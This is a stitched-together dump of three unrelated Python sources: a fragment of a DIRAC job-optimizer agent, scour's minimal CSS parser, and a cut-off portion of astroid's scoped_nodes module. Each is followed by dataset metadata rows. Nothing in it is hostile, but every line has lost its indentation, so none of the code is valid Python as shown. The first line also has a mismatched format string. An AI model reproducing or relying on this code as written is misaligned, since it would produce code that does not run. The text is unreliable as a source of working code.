gLogger.error( "Cannot retrieve attributes for %s jobs %s" % len( newJobsList ) )
return result
jobsToProcess = result[ 'Value' ]
for jobId in jobsToProcess:
self.log.info( "== Processing job %s == " % jobId )
jobAttrs = jobsToProcess[ jobId ]
result = self.__dispatchJob( jobId, jobAttrs, False )
if not result[ 'OK' ]:
gLogger.error( "There was a problem optimizing job", "JID %s: %s" % ( jobId, result[ 'Message' ] ) )
return S_OK()
def __dispatchJob( self, jobId, jobAttrs, jobDef, keepOptimizing = True ):
""" Decide what to do with the Job
"""
returnValue = S_OK()
if keepOptimizing:
result = self.__sendJobToOptimizer( jobId, jobAttrs, jobDef )
if result[ 'OK' ] and result[ 'Value' ]:
return S_OK()
if not result[ 'OK' ]:
returnValue = result
gLogger.error( "Could not send job to optimizer\n",
"\tJob: %s\n\Message: %s" % ( jobId,
result[ 'Message' ] ) )
self._optimizingJobs.deleteJob( jobId )
return returnValue
def __sendJobToOptimizer( self, jobId, jobAttrs, jobDef ):
""" Send Job to Optimizer queue
"""
optimizerName = self.__getNextOptimizerName( jobAttrs )
if not optimizerName:
return S_OK( False )
if optimizerName not in self.am_getOption( "ValidOptimizers", self.__defaultValidOptimizers ):
return S_OK( False )
if optimizerName not in self._threadedOptimizers:
to = ThreadedOptimizer( optimizerName, self.am_getModuleParam( 'fullName' ),
self.__dispatchJob )
result = to.initialize( self.jobDB, self.jobLoggingDB )
if not result[ 'OK' ]:
return S_OK( False )
self._threadedOptimizers[ optimizerName ] = to
self._threadedOptimizers[ optimizerName ].optimizeJob( jobId, jobAttrs, jobDef )
return S_OK( True )
def __getNextOptimizerName( self, jobAttrs ):
""" Determine next Optimizer
"""
if jobAttrs[ 'Status' ] == 'Received':
optList = [ "JobPath" ]
elif jobAttrs[ 'Status' ] == 'Checking':
optList = List.fromChar( jobAttrs[ 'MinorStatus' ], "/" )
else:
return False
if len( optList ) == 1:
optList.insert( 0, "WorkloadManagement" )
if len( optList ) > 2:
optList[1] = "/".join( optList[1:] )
return "/".join( optList )
gOptimizingJobs = ThreadSafe.Synchronizer()
class JobsInTheWorks:
def __init__( self, maxTime = 0 ):
self.__jobs = {}
self.__maxTime = maxTime
self.log = gLogger.getSubLogger( "JobsBeingOptimized" )
@gOptimizingJobs
def addJobs( self, jobsList ):
now = time.time()
self.__purgeExpiredJobs()
addedJobs = []
for job in jobsList:
if job not in self.__jobs:
self.__jobs[ job ] = now
addedJobs.append( job )
self.log.info( "Added %s jobs to the list" % addedJobs )
return addedJobs
def __purgeExpiredJobs( self ):
if not self.__maxTime:
return
stillOnIt = {}
now = time.time()
for job in self.__jobs:
if now - self.__jobs[ job ] < self.__maxTime:
stillOnIt[ job ] = self.__jobs[ job ]
self.__jobs = stillOnIt
@gOptimizingJobs
def deleteJob( self, job ):
try:
if job in self.__jobs:
self.log.info( "Deleted job %s from the list" % job )
del( self.__jobs[ job ] )
except Exception, e:
print "=" * 20
print "EXCEPTION", e
print "THIS SHOULDN'T HAPPEN"
print "=" * 20
class ThreadedOptimizer( threading.Thread ):
def __init__( self, optimizerName, containerName, dispatchFunction ):
threading.Thread.__init__( self )
self.setDaemon( True )
self.optimizerName = optimizerName
self.containerName = containerName
self.dispatchFunction = dispatchFunction
self.jobQueue = Queue.Queue()
def initialize( self, jobDB, jobLoggingDB ):
self.jobDB = jobDB
self.jobLoggingDB = jobLoggingDB
gLogger.info( "Loading optimizer %s" % self.optimizerName )
result = self.__loadOptimizer()
if not result[ 'OK' ]:
return result
self.optimizer = result[ 'Value' ]
self.start()
return S_OK()
@gOptimizerLoadSync
def __loadOptimizer( self ):
#Need to load an optimizer
gLogger.info( "Loading optimizer %s" % self.optimizerName )
optList = List.fromChar( self.optimizerName, "/" )
optList[1] = "/".join( optList[1:] )
systemName = optList[0]
agentName = "%sAgent" % optList[1]
rootModulesToLook = gConfig.getValue( "/LocalSite/Extensions", [] ) + [ 'DIRAC' ]
for rootModule in rootModulesToLook:
try:
gLogger.info( "Trying to load from root module %s" % rootModule )
opPyPath = '%s.%sSystem.Agent.%s' % ( rootModule, systemName, agentName )
optimizerModule = __import__( opPyPath,
globals(),
locals(), agentName )
except ImportError, e:
gLogger.info( "Can't load %s: %s" % ( opPyPath, str( e ) ) )
continue
try:
optimizerClass = getattr( optimizerModule, agentName )
optimizer = optimizerClass( '%sAgent' % self.optimizerName, self.containerName )
result = optimizer.am_initialize( self.jobDB, self.jobLoggingDB )
if not result[ 'OK' ]:
return S_ERROR( "Can't initialize optimizer %s: %s" % ( self.optimizerName, result[ 'Message' ] ) )
return S_OK( optimizer )
except Exception, e:
gLogger.exception( "Can't load optimizer %s with root module %s" % ( self.optimizerName, rootModule ) )
return S_ERROR( "Can't load optimizer %s" % self.optimizerName )
def optimizeJob( self, jobId, jobAttrs, jobDef ):
self.jobQueue.put( ( jobId, jobAttrs, jobDef ), block = True )
def run( self ):
while True:
jobId, jobAttrs, jobDef = self.jobQueue.get( block = True )
#If there's no job def then get it
if not jobDef:
result = self.optimizer.getJobDefinition( jobId, jobDef )
if not result['OK']:
self.optimizer.setFailedJob( jobId, result[ 'Message' ] )
return result
jobDef = result[ 'Value' ]
#Does the optimizer require a proxy?
shifterEnv = False
if self.optimizer.am_getModuleParam( 'shifterProxy' ):
shifterEnv = True
result = setupShifterProxyInEnv( self.optimizer.am_getModuleParam( 'shifterProxy' ),
self.optimizer.am_getShifterProxyLocation() )
if not result[ 'OK' ]:
return result
#Call the initCycle function
result = self.optimizer.am_secureCall( self.optimizer.beginExecution, name = "beginExecution" )
if not result[ 'OK' ]:
return result
#Do the work
result = self.optimizer.optimizeJob( jobId, jobDef[ 'classad' ] )
#If there was a shifter proxy, unset it
if shifterEnv:
del( os.environ[ 'X509_USER_PROXY' ] )
if not result[ 'OK' ]:
gLogger.error( "Job failed optimization step\n",
"\tJob: %s\n\tOptimizer: %s\n\tMessage: %s" % ( jobId,
self.optimizerName,
result[ 'Message' ] ) )
self.dispatchFunction( jobId, jobAttrs, jobDef, False )
else:
#Job optimization was OK
nextOptimizer = result[ 'Value' ]
#Check if the JDL has changed
newJDL = jobDef[ 'classad' ].asJDL()
if newJDL != jobDef[ 'jdl' ]:
jobDef[ 'jdl' ] = newJDL
#If there's a new optimizer set it!
if nextOptimizer:
jobAttrs[ 'Status' ] = 'Checking'
jobAttrs[ 'MinorStatus' ] = nextOptimizer
gLogger.info( "Sending job %s to next optimizer: %s" % ( jobId, nextOptimizer ) )
else:
gLogger.info( "Finished optimizing job %s" % jobId )
self.dispatchFunction( jobId, jobAttrs, jobDef, nextOptimizer )
| gpl-3.0 | 209,051,821,181,226,140 | 36.673684 | 111 | 0.600447 | false |
EtienneOz/WebfontGenerator | scour/yocto_css.py | 8 | 2872 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# yocto-css, an extremely bare minimum CSS parser
#
# Copyright 2009 Jeff Schiller
#
# This file is part of Scour, http://www.codedread.com/scour/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# In order to resolve Bug 368716 (https://bugs.launchpad.net/scour/+bug/368716)
# scour needed a bare-minimum CSS parser in order to determine if some elements
# were still referenced by CSS properties.
# I looked at css-py (a CSS parser built in Python), but that library
# is about 35k of Python and requires ply to be installed. I just need
# something very basic to suit scour's needs.
# yocto-css takes a string of CSS and tries to spit out a list of rules
# A rule is an associative array (dictionary) with the following keys:
# - selector: contains the string of the selector (see CSS grammar)
# - properties: contains an associative array of CSS properties for this rule
# TODO: need to build up some unit tests for yocto_css
# stylesheet : [ CDO | CDC | S | statement ]*;
# statement : ruleset | at-rule;
# at-rule : ATKEYWORD S* any* [ block | ';' S* ];
# block : '{' S* [ any | block | ATKEYWORD S* | ';' S* ]* '}' S*;
# ruleset : selector? '{' S* declaration? [ ';' S* declaration? ]* '}' S*;
# selector : any+;
# declaration : property S* ':' S* value;
# property : IDENT;
# value : [ any | block | ATKEYWORD S* ]+;
# any : [ IDENT | NUMBER | PERCENTAGE | DIMENSION | STRING
# | DELIM | URI | HASH | UNICODE-RANGE | INCLUDES
# | DASHMATCH | FUNCTION S* any* ')'
# | '(' S* any* ')' | '[' S* any* ']' ] S*;
def parseCssString(str):
rules = []
# first, split on } to get the rule chunks
chunks = str.split('}')
for chunk in chunks:
# second, split on { to get the selector and the list of properties
bits = chunk.split('{')
if len(bits) != 2: continue
rule = {}
rule['selector'] = bits[0].strip()
# third, split on ; to get the property declarations
bites = bits[1].strip().split(';')
if len(bites) < 1: continue
props = {}
for bite in bites:
# fourth, split on : to get the property name and value
nibbles = bite.strip().split(':')
if len(nibbles) != 2: continue
props[nibbles[0].strip()] = nibbles[1].strip()
rule['properties'] = props
rules.append(rule)
return rules
| gpl-2.0 | 5,877,176,446,397,554,000 | 38.888889 | 79 | 0.652855 | false |
krader1961/python-mode | pymode/libs/astroid/scoped_nodes.py | 8 | 52820 | # copyright 2003-2013 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""This module contains the classes for "scoped" node, i.e. which are opening a
new local scope in the language definition : Module, Class, Function (and
Lambda, GenExpr, DictComp and SetComp to some extent).
"""
from __future__ import with_statement
__doctype__ = "restructuredtext en"
import sys
import warnings
from itertools import chain
try:
from io import BytesIO
except ImportError:
from cStringIO import StringIO as BytesIO
import six
from logilab.common.compat import builtins
from logilab.common.decorators import cached, cachedproperty
from astroid.exceptions import NotFoundError, \
AstroidBuildingException, InferenceError, ResolveError
from astroid.node_classes import Const, DelName, DelAttr, \
Dict, From, List, Pass, Raise, Return, Tuple, Yield, YieldFrom, \
LookupMixIn, const_factory as cf, unpack_infer, CallFunc
from astroid.bases import NodeNG, InferenceContext, Instance, copy_context, \
YES, Generator, UnboundMethod, BoundMethod, _infer_stmts, \
BUILTINS
from astroid.mixins import FilterStmtsMixin
from astroid.bases import Statement
from astroid.manager import AstroidManager
ITER_METHODS = ('__iter__', '__getitem__')
PY3K = sys.version_info >= (3, 0)
def _c3_merge(sequences):
"""Merges MROs in *sequences* to a single MRO using the C3 algorithm.
Adapted from http://www.python.org/download/releases/2.3/mro/.
"""
result = []
while True:
sequences = [s for s in sequences if s] # purge empty sequences
if not sequences:
return result
for s1 in sequences: # find merge candidates among seq heads
candidate = s1[0]
for s2 in sequences:
if candidate in s2[1:]:
candidate = None
break # reject the current head, it appears later
else:
break
if not candidate:
# Show all the remaining bases, which were considered as
# candidates for the next mro sequence.
bases = ["({})".format(", ".join(base.name
for base in subsequence))
for subsequence in sequences]
raise ResolveError("Cannot create a consistent method resolution "
"order for bases %s" % ", ".join(bases))
result.append(candidate)
# remove the chosen candidate
for seq in sequences:
if seq[0] == candidate:
del seq[0]
def _verify_duplicates_mro(sequences):
for sequence in sequences:
names = [node.qname() for node in sequence]
if len(names) != len(set(names)):
raise ResolveError('Duplicates found in the mro.')
def remove_nodes(func, cls):
def wrapper(*args, **kwargs):
nodes = [n for n in func(*args, **kwargs) if not isinstance(n, cls)]
if not nodes:
raise NotFoundError()
return nodes
return wrapper
def function_to_method(n, klass):
if isinstance(n, Function):
if n.type == 'classmethod':
return BoundMethod(n, klass)
if n.type != 'staticmethod':
return UnboundMethod(n)
return n
def std_special_attributes(self, name, add_locals=True):
if add_locals:
locals = self.locals
else:
locals = {}
if name == '__name__':
return [cf(self.name)] + locals.get(name, [])
if name == '__doc__':
return [cf(self.doc)] + locals.get(name, [])
if name == '__dict__':
return [Dict()] + locals.get(name, [])
raise NotFoundError(name)
MANAGER = AstroidManager()
def builtin_lookup(name):
"""lookup a name into the builtin module
return the list of matching statements and the astroid for the builtin
module
"""
builtin_astroid = MANAGER.ast_from_module(builtins)
if name == '__dict__':
return builtin_astroid, ()
try:
stmts = builtin_astroid.locals[name]
except KeyError:
stmts = ()
return builtin_astroid, stmts
# TODO move this Mixin to mixins.py; problem: 'Function' in _scope_lookup
class LocalsDictNodeNG(LookupMixIn, NodeNG):
""" this class provides locals handling common to Module, Function
and Class nodes, including a dict like interface for direct access
to locals information
"""
# attributes below are set by the builder module or by raw factories
# dictionary of locals with name as key and node defining the local as
# value
def qname(self):
"""return the 'qualified' name of the node, eg module.name,
module.class.name ...
"""
if self.parent is None:
return self.name
return '%s.%s' % (self.parent.frame().qname(), self.name)
def frame(self):
"""return the first parent frame node (i.e. Module, Function or Class)
"""
return self
def scope(self):
"""return the first node defining a new scope (i.e. Module,
Function, Class, Lambda but also GenExpr, DictComp and SetComp)
"""
return self
def _scope_lookup(self, node, name, offset=0):
"""XXX method for interfacing the scope lookup"""
try:
stmts = node._filter_stmts(self.locals[name], self, offset)
except KeyError:
stmts = ()
if stmts:
return self, stmts
if self.parent: # i.e. not Module
# nested scope: if parent scope is a function, that's fine
# else jump to the module
pscope = self.parent.scope()
if not pscope.is_function:
pscope = pscope.root()
return pscope.scope_lookup(node, name)
return builtin_lookup(name) # Module
def set_local(self, name, stmt):
"""define <name> in locals (<stmt> is the node defining the name)
if the node is a Module node (i.e. has globals), add the name to
globals
if the name is already defined, ignore it
"""
#assert not stmt in self.locals.get(name, ()), (self, stmt)
self.locals.setdefault(name, []).append(stmt)
__setitem__ = set_local
def _append_node(self, child):
"""append a child, linking it in the tree"""
self.body.append(child)
child.parent = self
def add_local_node(self, child_node, name=None):
"""append a child which should alter locals to the given node"""
if name != '__class__':
# add __class__ node as a child will cause infinite recursion later!
self._append_node(child_node)
self.set_local(name or child_node.name, child_node)
def __getitem__(self, item):
"""method from the `dict` interface returning the first node
associated with the given name in the locals dictionary
:type item: str
:param item: the name of the locally defined object
:raises KeyError: if the name is not defined
"""
return self.locals[item][0]
def __iter__(self):
"""method from the `dict` interface returning an iterator on
`self.keys()`
"""
return iter(self.keys())
def keys(self):
"""method from the `dict` interface returning a tuple containing
locally defined names
"""
return list(self.locals.keys())
def values(self):
"""method from the `dict` interface returning a tuple containing
locally defined nodes which are instance of `Function` or `Class`
"""
return [self[key] for key in self.keys()]
def items(self):
"""method from the `dict` interface returning a list of tuple
containing each locally defined name with its associated node,
which is an instance of `Function` or `Class`
"""
return list(zip(self.keys(), self.values()))
def __contains__(self, name):
return name in self.locals
has_key = __contains__
# Module #####################################################################
class Module(LocalsDictNodeNG):
_astroid_fields = ('body',)
fromlineno = 0
lineno = 0
# attributes below are set by the builder module or by raw factories
# the file from which as been extracted the astroid representation. It may
# be None if the representation has been built from a built-in module
file = None
# Alternatively, if built from a string/bytes, this can be set
file_bytes = None
# encoding of python source file, so we can get unicode out of it (python2
# only)
file_encoding = None
# the module name
name = None
# boolean for astroid built from source (i.e. ast)
pure_python = None
# boolean for package module
package = None
# dictionary of globals with name as key and node defining the global
# as value
globals = None
# Future imports
future_imports = None
# names of python special attributes (handled by getattr impl.)
special_attributes = set(('__name__', '__doc__', '__file__', '__path__',
'__dict__'))
# names of module attributes available through the global scope
scope_attrs = set(('__name__', '__doc__', '__file__', '__path__'))
def __init__(self, name, doc, pure_python=True):
self.name = name
self.doc = doc
self.pure_python = pure_python
self.locals = self.globals = {}
self.body = []
self.future_imports = set()
def _get_stream(self):
if self.file_bytes is not None:
return BytesIO(self.file_bytes)
if self.file is not None:
stream = open(self.file, 'rb')
return stream
return None
@property
def file_stream(self):
warnings.warn("file_stream property is deprecated and "
"it is slated for removal in astroid 1.6."
"Use the new method 'stream' instead.",
PendingDeprecationWarning,
stacklevel=2)
return self._get_stream()
def stream(self):
"""Get a stream to the underlying file or bytes."""
return self._get_stream()
def close(self):
"""Close the underlying file streams."""
warnings.warn("close method is deprecated and it is "
"slated for removal in astroid 1.6, along "
"with 'file_stream' property. "
"Its behaviour is replaced by managing each "
"file stream returned by the 'stream' method.",
PendingDeprecationWarning,
stacklevel=2)
def block_range(self, lineno):
"""return block line numbers.
start from the beginning whatever the given lineno
"""
return self.fromlineno, self.tolineno
def scope_lookup(self, node, name, offset=0):
if name in self.scope_attrs and not name in self.locals:
try:
return self, self.getattr(name)
except NotFoundError:
return self, ()
return self._scope_lookup(node, name, offset)
def pytype(self):
return '%s.module' % BUILTINS
def display_type(self):
return 'Module'
def getattr(self, name, context=None, ignore_locals=False):
if name in self.special_attributes:
if name == '__file__':
return [cf(self.file)] + self.locals.get(name, [])
if name == '__path__' and self.package:
return [List()] + self.locals.get(name, [])
return std_special_attributes(self, name)
if not ignore_locals and name in self.locals:
return self.locals[name]
if self.package:
try:
return [self.import_module(name, relative_only=True)]
except AstroidBuildingException:
raise NotFoundError(name)
except SyntaxError:
raise NotFoundError(name)
except Exception:# XXX pylint tests never pass here; do we need it?
import traceback
traceback.print_exc()
raise NotFoundError(name)
getattr = remove_nodes(getattr, DelName)
def igetattr(self, name, context=None):
"""inferred getattr"""
# set lookup name since this is necessary to infer on import nodes for
# instance
context = copy_context(context)
context.lookupname = name
try:
return _infer_stmts(self.getattr(name, context), context, frame=self)
except NotFoundError:
raise InferenceError(name)
def fully_defined(self):
"""return True if this module has been built from a .py file
and so contains a complete representation including the code
"""
return self.file is not None and self.file.endswith('.py')
def statement(self):
"""return the first parent node marked as statement node
consider a module as a statement...
"""
return self
def previous_sibling(self):
"""module has no sibling"""
return
def next_sibling(self):
"""module has no sibling"""
return
if sys.version_info < (2, 8):
@cachedproperty
def _absolute_import_activated(self):
for stmt in self.locals.get('absolute_import', ()):
if isinstance(stmt, From) and stmt.modname == '__future__':
return True
return False
else:
_absolute_import_activated = True
def absolute_import_activated(self):
return self._absolute_import_activated
def import_module(self, modname, relative_only=False, level=None):
"""import the given module considering self as context"""
if relative_only and level is None:
level = 0
absmodname = self.relative_to_absolute_name(modname, level)
try:
return MANAGER.ast_from_module_name(absmodname)
except AstroidBuildingException:
# we only want to import a sub module or package of this module,
# skip here
if relative_only:
raise
return MANAGER.ast_from_module_name(modname)
def relative_to_absolute_name(self, modname, level):
"""return the absolute module name for a relative import.
The relative import can be implicit or explicit.
"""
# XXX this returns non sens when called on an absolute import
# like 'pylint.checkers.astroid.utils'
# XXX doesn't return absolute name if self.name isn't absolute name
if self.absolute_import_activated() and level is None:
return modname
if level:
if self.package:
level = level - 1
package_name = self.name.rsplit('.', level)[0]
elif self.package:
package_name = self.name
else:
package_name = self.name.rsplit('.', 1)[0]
if package_name:
if not modname:
return package_name
return '%s.%s' % (package_name, modname)
return modname
def wildcard_import_names(self):
"""return the list of imported names when this module is 'wildcard
imported'
It doesn't include the '__builtins__' name which is added by the
current CPython implementation of wildcard imports.
"""
# take advantage of a living module if it exists
try:
living = sys.modules[self.name]
except KeyError:
pass
else:
try:
return living.__all__
except AttributeError:
return [name for name in living.__dict__.keys()
if not name.startswith('_')]
# else lookup the astroid
#
# We separate the different steps of lookup in try/excepts
# to avoid catching too many Exceptions
default = [name for name in self.keys() if not name.startswith('_')]
try:
all = self['__all__']
except KeyError:
return default
try:
explicit = next(all.assigned_stmts())
except InferenceError:
return default
except AttributeError:
# not an assignment node
# XXX infer?
return default
# Try our best to detect the exported name.
infered = []
try:
explicit = next(explicit.infer())
except InferenceError:
return default
if not isinstance(explicit, (Tuple, List)):
return default
str_const = lambda node: (isinstance(node, Const) and
isinstance(node.value, six.string_types))
for node in explicit.elts:
if str_const(node):
infered.append(node.value)
else:
try:
infered_node = next(node.infer())
except InferenceError:
continue
if str_const(infered_node):
infered.append(infered_node.value)
return infered
class ComprehensionScope(LocalsDictNodeNG):
def frame(self):
return self.parent.frame()
scope_lookup = LocalsDictNodeNG._scope_lookup
class GenExpr(ComprehensionScope):
_astroid_fields = ('elt', 'generators')
def __init__(self):
self.locals = {}
self.elt = None
self.generators = []
class DictComp(ComprehensionScope):
_astroid_fields = ('key', 'value', 'generators')
def __init__(self):
self.locals = {}
self.key = None
self.value = None
self.generators = []
class SetComp(ComprehensionScope):
_astroid_fields = ('elt', 'generators')
def __init__(self):
self.locals = {}
self.elt = None
self.generators = []
class _ListComp(NodeNG):
"""class representing a ListComp node"""
_astroid_fields = ('elt', 'generators')
elt = None
generators = None
if sys.version_info >= (3, 0):
class ListComp(_ListComp, ComprehensionScope):
"""class representing a ListComp node"""
def __init__(self):
self.locals = {}
else:
class ListComp(_ListComp):
"""class representing a ListComp node"""
# Function ###################################################################
def _infer_decorator_callchain(node):
"""Detect decorator call chaining and see if the end result is a
static or a classmethod.
"""
if not isinstance(node, Function):
return
if not node.parent:
return
try:
# TODO: We don't handle multiple inference results right now,
# because there's no flow to reason when the return
# is what we are looking for, a static or a class method.
result = next(node.infer_call_result(node.parent))
except (StopIteration, InferenceError):
return
if isinstance(result, Instance):
result = result._proxied
if isinstance(result, Class):
if result.is_subtype_of('%s.classmethod' % BUILTINS):
return 'classmethod'
if result.is_subtype_of('%s.staticmethod' % BUILTINS):
return 'staticmethod'
def _function_type(self):
"""
Function type, possible values are:
method, function, staticmethod, classmethod.
"""
# Can't infer that this node is decorated
# with a subclass of `classmethod` where `type` is first set,
# so do it here.
if self.decorators:
for node in self.decorators.nodes:
if isinstance(node, CallFunc):
# Handle the following case:
# @some_decorator(arg1, arg2)
# def func(...)
#
try:
current = next(node.func.infer())
except InferenceError:
continue
_type = _infer_decorator_callchain(current)
if _type is not None:
return _type
try:
for infered in node.infer():
# Check to see if this returns a static or a class method.
_type = _infer_decorator_callchain(infered)
if _type is not None:
return _type
if not isinstance(infered, Class):
continue
for ancestor in infered.ancestors():
if not isinstance(ancestor, Class):
continue
if ancestor.is_subtype_of('%s.classmethod' % BUILTINS):
return 'classmethod'
elif ancestor.is_subtype_of('%s.staticmethod' % BUILTINS):
return 'staticmethod'
except InferenceError:
pass
return self._type
class Lambda(LocalsDictNodeNG, FilterStmtsMixin):
_astroid_fields = ('args', 'body',)
name = '<lambda>'
# function's type, 'function' | 'method' | 'staticmethod' | 'classmethod'
type = 'function'
def __init__(self):
self.locals = {}
self.args = []
self.body = []
def pytype(self):
if 'method' in self.type:
return '%s.instancemethod' % BUILTINS
return '%s.function' % BUILTINS
def display_type(self):
if 'method' in self.type:
return 'Method'
return 'Function'
def callable(self):
return True
def argnames(self):
"""return a list of argument names"""
if self.args.args: # maybe None with builtin functions
names = _rec_get_names(self.args.args)
else:
names = []
if self.args.vararg:
names.append(self.args.vararg)
if self.args.kwarg:
names.append(self.args.kwarg)
return names
def infer_call_result(self, caller, context=None):
"""infer what a function is returning when called"""
return self.body.infer(context)
def scope_lookup(self, node, name, offset=0):
if node in self.args.defaults or node in self.args.kw_defaults:
frame = self.parent.frame()
# line offset to avoid that def func(f=func) resolve the default
# value to the defined function
offset = -1
else:
# check this is not used in function decorators
frame = self
return frame._scope_lookup(node, name, offset)
class Function(Statement, Lambda):
if PY3K:
_astroid_fields = ('decorators', 'args', 'body', 'returns')
returns = None
else:
_astroid_fields = ('decorators', 'args', 'body')
special_attributes = set(('__name__', '__doc__', '__dict__'))
is_function = True
# attributes below are set by the builder module or by raw factories
blockstart_tolineno = None
decorators = None
_type = "function"
type = cachedproperty(_function_type)
def __init__(self, name, doc):
self.locals = {}
self.args = []
self.body = []
self.name = name
self.doc = doc
self.extra_decorators = []
self.instance_attrs = {}
@cachedproperty
def fromlineno(self):
# lineno is the line number of the first decorator, we want the def
# statement lineno
lineno = self.lineno
if self.decorators is not None:
lineno += sum(node.tolineno - node.lineno + 1
for node in self.decorators.nodes)
return lineno
@cachedproperty
def blockstart_tolineno(self):
return self.args.tolineno
def block_range(self, lineno):
"""return block line numbers.
start from the "def" position whatever the given lineno
"""
return self.fromlineno, self.tolineno
def getattr(self, name, context=None):
"""this method doesn't look in the instance_attrs dictionary since it's
done by an Instance proxy at inference time.
"""
if name == '__module__':
return [cf(self.root().qname())]
if name in self.instance_attrs:
return self.instance_attrs[name]
return std_special_attributes(self, name, False)
def is_method(self):
"""return true if the function node should be considered as a method"""
# check we are defined in a Class, because this is usually expected
# (e.g. pylint...) when is_method() return True
return self.type != 'function' and isinstance(self.parent.frame(), Class)
def decoratornames(self):
"""return a list of decorator qualified names"""
result = set()
decoratornodes = []
if self.decorators is not None:
decoratornodes += self.decorators.nodes
decoratornodes += self.extra_decorators
for decnode in decoratornodes:
for infnode in decnode.infer():
result.add(infnode.qname())
return result
decoratornames = cached(decoratornames)
def is_bound(self):
"""return true if the function is bound to an Instance or a class"""
return self.type == 'classmethod'
def is_abstract(self, pass_is_abstract=True):
"""Returns True if the method is abstract.
A method is considered abstract if
- the only statement is 'raise NotImplementedError', or
- the only statement is 'pass' and pass_is_abstract is True, or
- the method is annotated with abc.astractproperty/abc.abstractmethod
"""
if self.decorators:
for node in self.decorators.nodes:
try:
infered = next(node.infer())
except InferenceError:
continue
if infered and infered.qname() in ('abc.abstractproperty',
'abc.abstractmethod'):
return True
for child_node in self.body:
if isinstance(child_node, Raise):
if child_node.raises_not_implemented():
return True
if pass_is_abstract and isinstance(child_node, Pass):
return True
return False
# empty function is the same as function with a single "pass" statement
if pass_is_abstract:
return True
def is_generator(self):
"""return true if this is a generator function"""
# XXX should be flagged, not computed
return next(self.nodes_of_class((Yield, YieldFrom),
skip_klass=(Function, Lambda)), False)
def infer_call_result(self, caller, context=None):
"""infer what a function is returning when called"""
if self.is_generator():
yield Generator()
return
# This is really a gigantic hack to work around metaclass generators
# that return transient class-generating functions. Pylint's AST structure
# cannot handle a base class object that is only used for calling __new__,
# but does not contribute to the inheritance structure itself. We inject
# a fake class into the hierarchy here for several well-known metaclass
# generators, and filter it out later.
if (self.name == 'with_metaclass' and
len(self.args.args) == 1 and
self.args.vararg is not None):
metaclass = next(caller.args[0].infer(context))
if isinstance(metaclass, Class):
c = Class('temporary_class', None)
c.hide = True
c.parent = self
bases = [next(b.infer(context)) for b in caller.args[1:]]
c.bases = [base for base in bases if base != YES]
c._metaclass = metaclass
yield c
return
returns = self.nodes_of_class(Return, skip_klass=Function)
for returnnode in returns:
if returnnode.value is None:
yield Const(None)
else:
try:
for infered in returnnode.value.infer(context):
yield infered
except InferenceError:
yield YES
def _rec_get_names(args, names=None):
"""return a list of all argument names"""
if names is None:
names = []
for arg in args:
if isinstance(arg, Tuple):
_rec_get_names(arg.elts, names)
else:
names.append(arg.name)
return names
# Class ######################################################################
def _is_metaclass(klass, seen=None):
""" Return if the given class can be
used as a metaclass.
"""
if klass.name == 'type':
return True
if seen is None:
seen = set()
for base in klass.bases:
try:
for baseobj in base.infer():
if baseobj in seen:
continue
else:
seen.add(baseobj)
if isinstance(baseobj, Instance):
# not abstract
return False
if baseobj is YES:
continue
if baseobj is klass:
continue
if not isinstance(baseobj, Class):
continue
if baseobj._type == 'metaclass':
return True
if _is_metaclass(baseobj, seen):
return True
except InferenceError:
continue
return False
def _class_type(klass, ancestors=None):
"""return a Class node type to differ metaclass, interface and exception
from 'regular' classes
"""
# XXX we have to store ancestors in case we have a ancestor loop
if klass._type is not None:
return klass._type
if _is_metaclass(klass):
klass._type = 'metaclass'
elif klass.name.endswith('Interface'):
klass._type = 'interface'
elif klass.name.endswith('Exception'):
klass._type = 'exception'
else:
if ancestors is None:
ancestors = set()
if klass in ancestors:
# XXX we are in loop ancestors, and have found no type
klass._type = 'class'
return 'class'
ancestors.add(klass)
for base in klass.ancestors(recurs=False):
name = _class_type(base, ancestors)
if name != 'class':
if name == 'metaclass' and not _is_metaclass(klass):
# don't propagate it if the current class
# can't be a metaclass
continue
klass._type = base.type
break
if klass._type is None:
klass._type = 'class'
return klass._type
def _iface_hdlr(iface_node):
"""a handler function used by interfaces to handle suspicious
interface nodes
"""
return True
class Class(Statement, LocalsDictNodeNG, FilterStmtsMixin):
# some of the attributes below are set by the builder module or
# by a raw factories
# a dictionary of class instances attributes
_astroid_fields = ('decorators', 'bases', 'body') # name
decorators = None
special_attributes = set(('__name__', '__doc__', '__dict__', '__module__',
'__bases__', '__mro__', '__subclasses__'))
blockstart_tolineno = None
_type = None
_metaclass_hack = False
hide = False
type = property(_class_type,
doc="class'type, possible values are 'class' | "
"'metaclass' | 'interface' | 'exception'")
def __init__(self, name, doc):
self.instance_attrs = {}
self.locals = {}
self.bases = []
self.body = []
self.name = name
self.doc = doc
def _newstyle_impl(self, context=None):
if context is None:
context = InferenceContext()
if self._newstyle is not None:
return self._newstyle
for base in self.ancestors(recurs=False, context=context):
if base._newstyle_impl(context):
self._newstyle = True
break
klass = self._explicit_metaclass()
# could be any callable, we'd need to infer the result of klass(name,
# bases, dict). punt if it's not a class node.
if klass is not None and isinstance(klass, Class):
self._newstyle = klass._newstyle_impl(context)
if self._newstyle is None:
self._newstyle = False
return self._newstyle
_newstyle = None
newstyle = property(_newstyle_impl,
doc="boolean indicating if it's a new style class"
"or not")
@cachedproperty
def blockstart_tolineno(self):
if self.bases:
return self.bases[-1].tolineno
else:
return self.fromlineno
def block_range(self, lineno):
"""return block line numbers.
start from the "class" position whatever the given lineno
"""
return self.fromlineno, self.tolineno
def pytype(self):
if self.newstyle:
return '%s.type' % BUILTINS
return '%s.classobj' % BUILTINS
def display_type(self):
return 'Class'
def callable(self):
return True
def is_subtype_of(self, type_name, context=None):
if self.qname() == type_name:
return True
